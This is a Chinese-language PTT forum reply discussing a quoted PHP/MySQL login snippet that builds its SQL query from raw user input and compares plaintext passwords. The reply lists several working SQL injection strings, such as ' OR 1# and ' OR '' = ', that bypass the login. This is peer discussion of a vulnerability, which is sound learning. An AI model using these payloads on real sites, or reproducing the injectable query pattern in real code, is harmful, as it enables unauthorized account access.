※ 引述《sder (sder)》之銘言： : 以上程式碼略… : $link=mysql_connect("localhost","sosokill","sosokill"); : mysql_select_db("member"); : $sql="SELECT *FROM membertest WHERE ID='".$ID."' AND : Password='".$Password."'"; : $result=mysql_query($sql); : //一般認證只會這樣寫 : //你加的重覆判斷帳號密碼，或許就是不會SQL Injection的原因@@ : if(mysql_num_rows($result) >= 1) { : // $Fields=mysql_fetch_array($result); : // if($Fields["ID"]==$ID && $Fields["Password"]==$Password){ : $_SESSION["login_session"]=true; : header("location:hello.php"); : }else : echo "<br>Password error<br>"; : mysql_close($link); : } : 以下程式碼略… 首先我搞錯了 囧 為了致歉多試幾種 再來試過發現，除了上篇推文裡面，應該這些都有辦法在上面的code work 帳號正常，密碼 'OR 1# （#也是註解符號） 帳號 abc /* ，密碼 */' OR 1# （這個玩得有點大） 帳號 ' OR 1#，密碼隨便 不用任何註解的方法 帳號：' OR '' = ' 密碼：' OR '' = ' 我覺得真的很囧，最近經常看錯文章... = = -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 140.112.199.119 ※ 編輯: ybite 來自: 140.112.199.119 (08/11 23:40)